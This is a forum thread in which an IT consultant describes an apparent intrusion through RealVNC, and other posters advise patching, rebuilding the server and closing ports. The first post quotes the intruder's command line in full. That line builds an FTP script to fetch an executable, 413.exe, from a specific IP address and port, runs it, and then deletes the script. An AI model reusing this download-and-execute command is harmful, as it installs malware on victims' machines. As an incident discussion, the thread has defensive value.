have i been hacked?

[lifegard2]

Hello,

While working at a client's site today (I'm an IT consultant), I had a remote desktop connection opened from their Win2k3 server into my WinXP Pro desktop. I was physically in front of the server and the desktop was in my remote office.

While typing an email on my desktop, the following text appeared on the screen rather quickly:

Rcmd.exe /c del i&echo open 66.245.220.124 33209 > i&echo user 1 1 >> I &echo get 413.exe >> I &echo quit >> I &ftp –n –s:I &413.exe&del i&exit

It appeared quick enough that it must have been copied and pasted, as I doubt anyone can type that fast.

I minimized the remote desktop window and noticed on the win2k3 server that the RealVNC icon had gone from white to black. Since I'm the only one who knows how to use the VNC connection, it smelled fishy. Netstat showed a connection from 66.245.220.124 on port 5900, the VNC port. The other odd thing is that I noticed the RealVNC icon in the system tray was black earlier today, so I killed all client connections.

Does anyone recognize this attempt? I'm curious what the commands do. From what I can see, it looks like they were trying to execute a remote command prompt and then download some script from an FTP site.

Any ideas? Thanks!

 

[Roadki11]

You are aware of the horrible vulnerability in VNC 4.1 and earlier? Very easy to exploit and bypass authentication. You should update VNC to 4.2 or newer ASAP if you havent already and run it on a port other than 5900/5800.

RoadKi11

 

[Roadki11]

I did some research on that 413.exe file. Im sorry to say it looks bad, everything i found on it has to do with porno. Not sure what it does but i bet it wasnt put there to help make your server run better thats for sure. you probably should get that box off your network right away and do a full system rebuild and restore. I hope its not an important server.

RoadKi11

 

[Roadki11]

that IP belongs to an ISP called dslextreme, you may be able to contact them and figure out who belongs to that IP. If nothing else they may be able to let that user know his box has been compromised, could be a botnet who knows.

http://www.dslextreme.com/

Good Luck,

RoadKi11

 

[lifegard2]

I don't think I'm infected. Whoever it was pasted the command into an email message I was typing, they never reached the command console. Also, I don't have rcmd setup on any of my systems, so I don't think it would have worked even if they weren't typing into an email.

From what I can tell, it looks like they were trying to open up an FTP connection on port 33209 (vs 21) to the IP address listed. I actually tried manually connecting via FTP to that address and port and was able to do so successfully, but I was unable to retrieve a directory listing.

That being said, I think at this time the only compromise is w/ VNC. I will definitely look into updating it ASAP.

 

[Grenage]

So you have port forwarding on the router to enable access by VNC from external connctions? I would consider taking that out for a bit, scanning every computer on the network thoughly, upgrade any VNC instances.

Never, ever base your security around "I don't think".


Carlsberg don't run I.T departments, but if they did they'd probably be more fun.

 

[Roadki11]

I agree, you got lucky and saw the security breach first hand 1 time. That server could have been exploited dozens of times that you havent witnessed. Its better to error on the side of caution with this one.

just my 2 cents.

RoadKi11

 

[lifegard2]

Yup, agreed. I already upgraded to 4.1.2, then disabled the service. I'll be closing the port soon. The VPN overhead slows VNC connections to a crawl, but the alternative is far worse. I guess there's also a silver lining to slow connections, I'm a consultant and bill hourly.

 

[cmeagan656]

Have a look at LogMeIn (

https://secure.logmein.com/welcome/get_logmein_free/signup.asp).

Just install it on any PC or server that you want to remote access and its like sitting in fromt of the console.

They have other products that, as an IT consultant, might interest you too but this one is free.

Cheers.